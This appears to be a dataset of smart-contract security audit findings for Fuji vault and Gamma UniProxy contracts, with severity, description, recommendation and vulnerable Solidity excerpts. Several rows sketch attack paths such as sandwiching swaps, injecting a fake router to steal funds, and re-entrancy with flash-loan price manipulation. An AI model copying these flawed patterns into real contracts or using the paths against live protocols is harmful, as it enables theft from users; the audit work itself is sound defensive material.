temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n debtTotal + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(addrs, borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\n// Compute how much collateral needs to be swapt for all liquidated users\\nuint256 collateralInPlay = \\_getCollateralInPlay(\\n vAssets.collateralAsset,\\n vAssets.borrowAsset,\\n \\_amount + \\_flashloanFee + bonus\\n);\\n\\n// Burn f1155\\n\\_burnMulti(\\_addrs, \\_borrowBals, vAssets, \\_vault, f1155);\\n\\n// Withdraw collateral\\nIVault(\\_vault).withdrawLiq(int256(collateralInPlay));\\n```\\n\\n```\\nuint256 amount = \\_amount < 0 ? debtTotal : uint256(\\_amount);\\n```\\n\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\n\\npot. unsafe truncation (unlikely)\\n```\\nfunction updateState(uint256 \\_assetID, uint256 newBalance) external override onlyPermit {\\n uint256 total = totalSupply(\\_assetID);\\n if (newBalance > 0 && total > 0 && newBalance > total) {\\n uint256 newIndex = (indexes[\\_assetID] \\* newBalance) / total;\\n indexes[\\_assetID] = uint128(newIndex);\\n }\\n}\\n```\\n","If negative values are only used as a flag to indicate that all funds should be used for an operation, use `type(uint256).max` instead. It is wasting less value-space for a simple flag than using the uint256 high-bit range. Avoid typecast where possible. Use `SafeCast` instead or verify that the casts are safe because the values they operate on cannot under- or overflow. Add inline code comments if that's the case.",,```\\n⇒ solidity-shell\\n\\n🚀 Entering interactive Solidity ^0.8.11 shell. '.help' and '.exit' are your friends.\\n » ℹ️ ganache-mgr: starting temp. ganache instance // rest of code\\n » uint(int(-100))\\n115792089237316195423570985008687907853269984665640564039457584007913129639836\\n » int256(uint(2\\*\\*256-100))\\n-100\\n```\\n +Missing input validation on flash close fee factors,medium,"The `FliquidatorFTM` contract allows authorized parties to set the flash close fee factor. The factor is provided as two integers denoting numerator and denominator. Due to a lack of boundary checks, it is possible to set unrealistically high factors, which go well above 1. This can have unexpected effects on internal accounting and the impact of flashloan balances.\\n```\\nfunction setFlashCloseFee(uint64 \\_newFactorA, uint64 \\_newFactorB) external isAuthorized {\\n flashCloseF.a = \\_newFactorA;\\n flashCloseF.b = \\_newFactorB;\\n```\\n",Add a requirement making sure that `flashCloseF.a <= flashCloseF.b`.,,"```\\nfunction setFlashCloseFee(uint64 \\_newFactorA, uint64 \\_newFactorB) external isAuthorized {\\n flashCloseF.a = \\_newFactorA;\\n flashCloseF.b = \\_newFactorB;\\n```\\n" +Separation of concerns and consistency in vaults,medium,"The `FujiVaultFTM` contract contains multiple balance-changing functions. Most notably, `withdraw` is passed an `int256` denoted amount parameter. Negative values of this parameter are given to the `_internalWithdraw` function, where they trigger the withdrawal of all collateral. This approach can result in accounting mistakes in the future as beyond a certain point in the vault's accounting; amounts are expected to be only positive. Furthermore, the concerns of withdrawing and entirely withdrawing are not separated.\\nThe above issue applies analogously to the `payback` function and its dependency on `_internalPayback`.\\nFor consistency, `withdrawLiq` also takes an `int256` amount parameter. This function is only accessible to the `Fliquidator` contract and withdraws collateral from the active provider. However, all occurrences of the `_withdrawAmount` parameter are cast to `uint256`.\\nThe `withdraw` entry point:\\n```\\nfunction withdraw(int256 \\_withdrawAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalWithdraw(\\_withdrawAmount);\\n}\\n```\\n\\n_internalWithdraw's negative amount check:\\n```\\nuint256 amountToWithdraw = \\_withdrawAmount < 0\\n ? providedCollateral - neededCollateral\\n : uint256(\\_withdrawAmount);\\n```\\n\\nThe `withdrawLiq` entry point for the Fliquidator:\\n```\\nfunction withdrawLiq(int256 \\_withdrawAmount) external override nonReentrant onlyFliquidator {\\n // Logic used when called by Fliquidator\\n \\_withdraw(uint256(\\_withdrawAmount), address(activeProvider));\\n IERC20Upgradeable(vAssets.collateralAsset).univTransfer(\\n payable(msg.sender),\\n uint256(\\_withdrawAmount)\\n );\\n}\\n```\\n","We recommend splitting the `withdraw(int256)` function into two: `withdraw(uint256)` and `withdrawAll()`. These will provide the same functionality while rendering the updated code of `_internalWithdraw` easier to read, maintain, and harder to manipulate. The recommendation applies to `payback` and `_internalPayback`.\\nSimilarly, withdrawLiq's parameter should be a `uint256` to prevent unnecessary casts.",,```\\nfunction withdraw(int256 \\_withdrawAmount) public override nonReentrant {\\n updateF1155Balances();\\n \\_internalWithdraw(\\_withdrawAmount);\\n}\\n```\\n +Aave/Geist Interface declaration mismatch and unchecked return values,medium,"The two lending providers, Geist & Aave, do not seem to be directly affiliated even though one is a fork of the other. However, the interfaces may likely diverge in the future. Using the same interface declaration for both protocols might become problematic with future upgrades to either protocol. The interface declaration does not seem to come from the original upstream project. The interface `IAaveLendingPool` does not declare any return values while some of the functions called in Geist or Aave return them.\\nNote: that we have not verified all interfaces for correctness. However, we urge the client to only use official interface declarations from the upstream projects and verify that all other interfaces match.\\nThe `ILendingPool` configured in `ProviderAave` (0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5 -> implementation: 0xc6845a5c768bf8d7681249f8927877efda425baf)\\n```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n\\nThe `IAaveLendingPool` does not declare return values for any function, while upstream does.\\n```\\n// SPDX-License-Identifier: MIT\\n\\npragma solidity ^0.8.0;\\n\\ninterface IAaveLendingPool {\\n function flashLoan(\\n address receiverAddress,\\n address[] calldata assets,\\n uint256[] calldata amounts,\\n uint256[] calldata modes,\\n address onBehalfOf,\\n bytes calldata params,\\n uint16 referralCode\\n ) external;\\n\\n function deposit(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_onBehalfOf,\\n uint16 \\_referralCode\\n ) external;\\n\\n function withdraw(\\n address \\_asset,\\n uint256 \\_amount,\\n address \\_to\\n ) external;\\n\\n function borrow(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_interestRateMode,\\n uint16 \\_referralCode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function repay(\\n address \\_asset,\\n uint256 \\_amount,\\n uint256 \\_rateMode,\\n address \\_onBehalfOf\\n ) external;\\n\\n function setUserUseReserveAsCollateral(address \\_asset, bool \\_useAsCollateral) external;\\n}\\n```\\n\\nMethods: `withdraw()`, `repay()` return `uint256` in the original implementation for Aave, see:\\nhttps://etherscan.io/address/0xc6845a5c768bf8d7681249f8927877efda425baf#code\\nThe `ILendingPool` configured for Geist:\\nMethods `withdraw()`, `repay()` return `uint256` in the original implementation for Geist, see:\\nhttps://ftmscan.com/address/0x3104ad2aadb6fe9df166948a5e3a547004862f90#code\\nNote: that the actual `amount` withdrawn does not necessarily need to match the `amount` provided with the function argument. Here's an excerpt of the upstream LendingProvider.withdraw():\\n```\\n// rest of code\\n if (amount == type(uint256).max) {\\n amountToWithdraw = userBalance;\\n }\\n// rest of code\\n return amountToWithdraw;\\n```\\n\\nAnd here's the code in Fuji that calls that method. This will break the `withdrawAll` functionality of `LendingProvider` if token `isFTM`.\\n```\\nfunction withdraw(address \\_asset, uint256 \\_amount) external payable override {\\n IAaveLendingPool aave = IAaveLendingPool(\\_getAaveProvider().getLendingPool());\\n\\n bool isFtm = \\_asset == \\_getFtmAddr();\\n address \\_tokenAddr = isFtm ? \\_getWftmAddr() : \\_asset;\\n\\n aave.withdraw(\\_tokenAddr, \\_amount, address(this));\\n\\n // convert WFTM to FTM\\n if (isFtm) {\\n address unwrapper = \\_getUnwrapper();\\n IERC20(\\_tokenAddr).univTransfer(payable(unwrapper), \\_amount);\\n IUnwrapper(unwrapper).withdraw(\\_amount);\\n }\\n}\\n```\\n\\nSimilar for `repay()`, which returns the actual amount repaid.",Always use the original interface unless only a minimal subset of functions is used.\\nUse the original upstream interfaces of the corresponding project (link via the respective npm packages if available).\\nAvoid omitting parts of the function declaration! Especially when it comes to return values.\\nCheck return values. Use the value returned from `withdraw()` AND `repay()`,,```\\nfunction \\_getAaveProvider() internal pure returns (IAaveLendingPoolProvider) {\\n return IAaveLendingPoolProvider(0xB53C1a33016B2DC2fF3653530bfF1848a515c8c5);\\n}\\n```\\n +Missing slippage protection for rewards swap,medium,"In `FujiVaultFTM.harvestRewards` a swap transaction is generated using a call to `SwapperFTM.getSwapTransaction`. In all relevant scenarios, this call uses a minimum output amount of zero, which de-facto deactivates slippage checks. Most values from harvesting rewards can thus be siphoned off by sandwiching such calls.\\n`amountOutMin` is `0`, effectively disabling slippage control in the swap method.\\n```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n\\nOnly success required\\n```\\n// Swap rewards -> collateralAsset\\n(success, ) = swapTransaction.to.call{ value: swapTransaction.value }(swapTransaction.data);\\nrequire(success, ""failed to swap rewards"");\\n```\\n","Use a slippage check such as for liquidator swaps:\\n```\\nrequire(\\n (priceDelta \\* SLIPPAGE\\_LIMIT\\_DENOMINATOR) / priceFromOracle < SLIPPAGE\\_LIMIT\\_NUMERATOR,\\n Errors.VL\\_SWAP\\_SLIPPAGE\\_LIMIT\\_EXCEED\\n);\\n```\\n\\nOr specify a non-zero `amountOutMin` argument in calls to `IUniswapV2Router01.swapExactETHForTokens`.",,"```\\ntransaction.data = abi.encodeWithSelector(\\n IUniswapV2Router01.swapExactETHForTokens.selector,\\n 0,\\n path,\\n msg.sender,\\n type(uint256).max\\n);\\n```\\n" +FujiOracle - _getUSDPrice does not detect stale oracle prices; General Oracle Risks,medium,"The external Chainlink oracle, which provides index price information to the system, introduces risk inherent to any dependency on third-party data sources. For example, the oracle could fall behind or otherwise fail to be maintained, resulting in outdated data being fed to the index price calculations. Oracle reliance has historically resulted in crippled on-chain systems, and complications that lead to these outcomes can arise from things as simple as network congestion.\\nThis is more extreme in lesser-known tokens with fewer ChainLink Price feeds to update the price frequently.\\nEnsuring that unexpected oracle return values are correctly handled will reduce reliance on off-chain components and increase the resiliency of the smart contract system that depends on them.\\nThe codebase, as is, relies on `chainLinkOracle.latestRoundData()` and does not check the `timestamp` or `answeredIn` round of the returned price.\\nHere's how the oracle is consumed, skipping any fields that would allow checking for stale data:\\n```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n\\nHere's the implementation of the v0.6 FluxAggregator Chainlink feed with a note that timestamps should be checked.\\n```\\n\\* @return updatedAt is the timestamp when the round last was updated (i.e.\\n\\* answer was last computed)\\n```\\n","Perform sanity checks on the price returned by the oracle. If the price is older, not within configured limits, revert or handle in other means.\\nThe oracle does not provide any means to remove a potentially broken price-feed (e.g., by updating its address to `address(0)` or by pausing specific feeds or the complete oracle). The only way to pause an oracle right now is to deploy a new oracle contract. Therefore, consider adding minimally invasive functionality to pause the price-feeds if the oracle becomes unreliable.\\nMonitor the oracle data off-chain and intervene if it becomes unreliable.\\nOn-chain, realistically, both `answeredInRound` and `updatedAt` must be checked within acceptable bounds.\\n`answeredInRound == latestRound` - in this case, data may be assumed to be fresh while it might not be because the feed was entirely abandoned by nodes (no one starting a new round). Also, there's a good chance that many feeds won't always be super up-to-date (it might be acceptable to allow a threshold). A strict check might lead to transactions failing (race; e.g., round just timed out).\\n`roundId + threshold >= answeredInRound` - would allow a deviation of threshold rounds. This check alone might still result in stale data to be used if there are no more rounds. Therefore, this should be combined with `updatedAt + threshold >= block.timestamp`.",,"```\\n/\\*\\*\\n \\* @dev Calculates the USD price of asset.\\n \\* @param \\_asset: the asset address.\\n \\* Returns the USD price of the given asset\\n \\*/\\nfunction \\_getUSDPrice(address \\_asset) internal view returns (uint256 price) {\\n require(usdPriceFeeds[\\_asset] != address(0), Errors.ORACLE\\_NONE\\_PRICE\\_FEED);\\n\\n (, int256 latestPrice, , , ) = AggregatorV3Interface(usdPriceFeeds[\\_asset]).latestRoundData();\\n\\n price = uint256(latestPrice);\\n}\\n```\\n" +Unclaimed or front-runnable proxy implementations,medium,"Various smart contracts in the system require initialization functions to be called. The point when these calls happen is up to the deploying address. Deployment and initialization in one transaction are typically safe, but it can potentially be front-run if the initialization is done in a separate transaction.\\nA frontrunner can call these functions to silently take over the contracts and provide malicious parameters or plant a backdoor during the deployment.\\nLeaving proxy implementations uninitialized further aides potential phishing attacks where users might claim that - just because a contract address is listed in the official documentation/code-repo - a contract is a legitimate component of the system. At the same time, it is ‘only' a proxy implementation that an attacker claimed. For the end-user, it might be hard to distinguish whether this contract is part of the system or was a maliciously appropriated implementation.\\n```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n\\n`FujiVault` was initialized many days after deployment, and `FujiVault` inherits `VaultBaseUpgradeable`, which exposes a `delegatecall` that can be used to `selfdestruct` the contract's implementation.\\nAnother `FujiVault` was deployed by `deployer` initialized in a 2-step approach that can theoretically silently be front-run.\\ncode/artifacts/250-core.deploy:L2079-L2079\\n```\\n""deployer"": ""0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148"",\\n```\\n\\nTransactions of deployer:\\nhttps://ftmscan.com/txs?a=0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148&p=2\\nThe specific contract was initialized 19 blocks after deployment.\\nhttps://ftmscan.com/address/0x8513c2db99df213887f63300b23c6dd31f1d14b0\\n\\n`FujiAdminFTM` (and others) don't seem to be initialized. (low prior; no risk other than pot. reputational damage)\\ncode/artifacts/250-core.deploy:L1-L7\\n```\\n{\\n ""FujiAdmin"": {\\n ""address"": ""0xaAb2AAfBFf7419Ff85181d3A846bA9045803dd67"",\\n ""deployer"": ""0xb98d4D4e205afF4d4755E9Df19BD0B8BD4e0f148"",\\n ""abi"": [\\n {\\n ""anonymous"": false,\\n```\\n","It is recommended to use constructors wherever possible to immediately initialize proxy implementations during deploy-time. The code is only run when the implementation is deployed and affects the proxy initializations. If other initialization functions are used, we recommend enforcing deployer access restrictions or a standardized, top-level `initialized` boolean, set to `true` on the first deployment and used to prevent future initialization.\\nUsing constructors and locked-down initialization functions will significantly reduce potential developer errors and the possibility of attackers re-initializing vital system components.",,"```\\nfunction initialize(\\n address \\_fujiadmin,\\n address \\_oracle,\\n address \\_collateralAsset,\\n address \\_borrowAsset\\n) external initializer {\\n```\\n" +WFTM - Use of incorrect interface declarations,low,"The `WFTMUnwrapper` and various providers utilize the `IWETH` interface declaration for handling funds denoted in `WFTM`. However, the `WETH` and `WFTM` implementations are different. `WFTM` returns `uint256` values to indicate error conditions while the `WETH` contract does not.\\n```\\ncontract WFTMUnwrapper {\\n address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }("""");\\n require(sent, ""Failed to send FTM"");\\n }\\n}\\n```\\n\\nThe `WFTM` contract on Fantom returns an error return value. The error return value cannot be checked when utilizing the `IWETH` interface for `WFTM`. The error return values are never checked throughout the system for `WFTM` operations. This might be intentional to allow `amount=0` on `WETH` to act as a NOOP similar to `WETH`.\\n```\\n// convert FTM to WFTM\\nif (isFtm) IWETH(\\_tokenAddr).deposit{ value: \\_amount }();\\n```\\n\\nAlso see issues: issue 4.4, issue 4.5, issue 4.10","We recommend using the correct interfaces for all contracts instead of partial stubs. Do not modify the original function declarations, e.g., by omitting return value declarations. The codebase should also check return values where possible or explicitly state why values can safely be ignored in inline comments or the function's natspec documentation block.",,"```\\ncontract WFTMUnwrapper {\\n address constant wftm = 0x21be370D5312f44cB42ce377BC9b8a0cEF1A4C83;\\n\\n receive() external payable {}\\n\\n /\\*\\*\\n \\* @notice Convert WFTM to FTM and transfer to msg.sender\\n \\* @dev msg.sender needs to send WFTM before calling this withdraw\\n \\* @param \\_amount amount to withdraw.\\n \\*/\\n function withdraw(uint256 \\_amount) external {\\n IWETH(wftm).withdraw(\\_amount);\\n (bool sent, ) = msg.sender.call{ value: \\_amount }("""");\\n require(sent, ""Failed to send FTM"");\\n }\\n}\\n```\\n" +"Inconsistent isFTM, isETH checks",low,"`LibUniversalERC20FTM.isFTM()` and `LibUniversalERC20.isETH()` identifies native assets by matching against two distinct addresses while some components only check for one.\\nThe same is true for `FTM`.\\n`Flasher` only identifies a native `asset` transfer by matching `asset` against `_ETH = 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE` while `univTransfer()` identifies it using `0x0 || 0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE`\\n```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n\\n`LibUniversalERC20`\\n```\\nlibrary LibUniversalERC20 {\\n using SafeERC20 for IERC20;\\n\\n IERC20 private constant \\_ETH\\_ADDRESS = IERC20(0xEeeeeEeeeEeEeeEeEeEeeEEEeeeeEeeeeeeeEEeE);\\n IERC20 private constant \\_ZERO\\_ADDRESS = IERC20(0x0000000000000000000000000000000000000000);\\n\\n function isETH(IERC20 token) internal pure returns (bool) {\\n return (token == \\_ZERO\\_ADDRESS || token == \\_ETH\\_ADDRESS);\\n }\\n```\\n\\n```\\nfunction univTransfer(\\n IERC20 token,\\n address payable to,\\n uint256 amount\\n) internal {\\n if (amount > 0) {\\n if (isETH(token)) {\\n (bool sent, ) = to.call{ value: amount }("""");\\n require(sent, ""Failed to send Ether"");\\n } else {\\n token.safeTransfer(to, amount);\\n }\\n }\\n}\\n```\\n\\nThere are multiple other instances of this\\n```\\nuint256 \\_value = vAssets.borrowAsset == ETH ? debtTotal : 0;\\n```\\n","Consider using a consistent way to identify native asset transfers (i.e. `ETH`, FTM) by using `LibUniversalERC20.isETH()`. Alternatively, the system can be greatly simplified by expecting WFTM and only working with it. This simplification will remove all special cases where the library must handle non-ERC20 interfaces.",,"```\\nfunction callFunction(\\n address sender,\\n Account.Info calldata account,\\n bytes calldata data\\n) external override {\\n require(msg.sender == \\_dydxSoloMargin && sender == address(this), Errors.VL\\_NOT\\_AUTHORIZED);\\n account;\\n\\n FlashLoan.Info memory info = abi.decode(data, (FlashLoan.Info));\\n\\n uint256 \\_value;\\n if (info.asset == \\_ETH) {\\n // Convert WETH to ETH and assign amount to be set as msg.value\\n \\_convertWethToEth(info.amount);\\n \\_value = info.amount;\\n } else {\\n // Transfer to Vault the flashloan Amount\\n // \\_value is 0\\n IERC20(info.asset).univTransfer(payable(info.vault), info.amount);\\n }\\n```\\n" +FujiOracle - setPriceFeed should check asset and priceFeed decimals,low,"`getPriceOf()` assumes that all price feeds return prices with identical decimals, but `setPriceFeed` does not enforce this. Potential misconfigurations can have severe effects on the system's internal accounting.\\n```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\n",We recommend adding additional checks to detect unexpected changes in assets' properties. Safeguard price feeds by enforcing `priceFeed` == address(0) || priceFeed.decimals() == `8`. This allows the owner to disable a `priceFeed` (setting it to zero) and otherwise ensure that the feed is compatible and indeed returns `8` decimals.,,"```\\n/\\*\\*\\n \\* @dev Sets '\\_priceFeed' address for a '\\_asset'.\\n \\* Can only be called by the contract owner.\\n \\* Emits a {AssetPriceFeedChanged} event.\\n \\*/\\nfunction setPriceFeed(address \\_asset, address \\_priceFeed) public onlyOwner {\\n require(\\_priceFeed != address(0), Errors.VL\\_ZERO\\_ADDR);\\n usdPriceFeeds[\\_asset] = \\_priceFeed;\\n emit AssetPriceFeedChanged(\\_asset, \\_priceFeed);\\n}\\n```\\n" +UniProxy.depositSwap - Tokens are not approved before calling Router.exactInput,high,"the call to Router.exactInputrequires the sender to pre-approve the tokens. We could not find any reference for that, thus we assume that a call to `UniProxy.depositSwap` will always revert.\\n```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\n",Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nConsider approving the exact amount of input tokens before the swap.,,"```\\nrouter = ISwapRouter(\\_router);\\nuint256 amountOut;\\nuint256 swap;\\nif(swapAmount < 0) {\\n //swap token1 for token0\\n\\n swap = uint256(swapAmount \\* -1);\\n IHypervisor(pos).token1().transferFrom(msg.sender, address(this), deposit1+swap);\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit0\\n )\\n );\\n}\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n```\\n" +Uniproxy.depositSwap - _router should not be determined by the caller,high,"`Uniproxy.depositSwap` uses `_router` that is determined by the caller, which in turn might inject a “fake” contract, and thus may steal funds stuck in the `UniProxy` contract.\\nThe `UniProxy` contract has certain trust assumptions regarding the router. The router is supposed to return not less than deposit1(or deposit0) amount of tokens but that fact is never checked.\\n```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\n","Consider removing the `_router` parameter from the function, and instead, use a storage variable that will be initialized in the constructor.",,"```\\nfunction depositSwap(\\n int256 swapAmount, // (-) token1, (+) token0 for token1; amount to swap\\n uint256 deposit0,\\n uint256 deposit1,\\n address to,\\n address from,\\n bytes memory path,\\n address pos,\\n address \\_router\\n) external returns (uint256 shares) {\\n```\\n" +Re-entrancy + flash loan attack can invalidate price check,high,"The `UniProxy` contract has a price manipulation protection:\\n```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n\\nBut after that, the tokens are transferred from the user, if the token transfer allows an attacker to hijack the call-flow of the transaction inside, the attacker can manipulate the Uniswap price there, after the check happened. The Hypervisor's `deposit` function itself is vulnerable to the flash-loan attack.","Make sure the price does not change before the `Hypervisor.deposit` call. For example, the token transfers can be made at the beginning of the `UniProxy.deposit` function.",,"```\\nif (twapCheck || positions[pos].twapOverride) {\\n // check twap\\n checkPriceChange(\\n pos,\\n (positions[pos].twapOverride ? positions[pos].twapInterval : twapInterval),\\n (positions[pos].twapOverride ? positions[pos].priceThreshold : priceThreshold)\\n );\\n}\\n```\\n" +UniProxy.properDepositRatio - Proper ratio will not prevent liquidity imbalance for all possible scenarios,high,"`UniProxy.properDepositRatio` purpose is to be used as a mechanism to prevent liquidity imbalance. The idea is to compare the deposit ratio with the `hypeRatio`, which is the ratio between the tokens held by the `Hypervisor` contract. In practice, however, this function will not prevent a skewed deposit ratio in many cases. `deposit1 / deposit0` might be a huge number, while `10^16 <= depositRatio <= 10^18`, and 10^16 <= `hypeRatio` <= 10^18. Let us consider the case where `hype1 / hype0 >= 10`, that means `hypeRatio = 10^18`, and now if `deposit1 / deposit0` = 10^200 for example, `depositRatio = 10^18`, and the transaction will pass, which is clearly not intended.\\n```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\n","Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `properDepositRatio` function.\\nConsider removing the cap of [0.1,10] both for `depositRatio` and for `hypeRatio`.",,"```\\nfunction properDepositRatio(\\n address pos,\\n uint256 deposit0,\\n uint256 deposit1\\n) public view returns (bool) {\\n (uint256 hype0, uint256 hype1) = IHypervisor(pos).getTotalAmounts();\\n if (IHypervisor(pos).totalSupply() != 0) {\\n uint256 depositRatio = deposit0 == 0 ? 10e18 : deposit1.mul(1e18).div(deposit0);\\n depositRatio = depositRatio > 10e18 ? 10e18 : depositRatio;\\n depositRatio = depositRatio < 10e16 ? 10e16 : depositRatio;\\n uint256 hypeRatio = hype0 == 0 ? 10e18 : hype1.mul(1e18).div(hype0);\\n hypeRatio = hypeRatio > 10e18 ? 10e18 : hypeRatio;\\n hypeRatio = hypeRatio < 10e16 ? 10e16 : hypeRatio;\\n return (FullMath.mulDiv(depositRatio, deltaScale, hypeRatio) < depositDelta &&\\n FullMath.mulDiv(hypeRatio, deltaScale, depositRatio) < depositDelta);\\n }\\n return true;\\n}\\n```\\n" +UniProxy.depositSwap doesn't deposit all the users' funds,medium,"When executing the swap, the minimal amount out is passed to the router (deposit1 in this example), but the actual swap amount will be `amountOut`. But after the trade, instead of depositing `amountOut`, the contract tries to deposit `deposit1`, which is lower. This may result in some users' funds staying in the `UniProxy` contract.\\n```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer from proxy to msg.sender\\n shares = IHypervisor(pos).deposit(deposit0, deposit1, address(this));\\n IHypervisor(pos).transfer(to, shares);\\n}\\n```\\n",Resolution\\nFixed in GammaStrategies/[email protected]9a7a3dd by deleting the `depositSwap` function.\\nDeposit all the user's funds to the Hypervisor.,,"```\\nelse{\\n //swap token1 for token0\\n swap = uint256(swapAmount);\\n IHypervisor(pos).token0().transferFrom(msg.sender, address(this), deposit0+swap);\\n\\n amountOut = router.exactInput(\\n ISwapRouter.ExactInputParams(\\n path,\\n address(this),\\n block.timestamp + swapLife,\\n swap,\\n deposit1\\n )\\n ); \\n}\\n\\nrequire(amountOut > 0, ""Swap failed"");\\n\\nif (positions[pos].version < 2) {\\n // requires lp token transfer 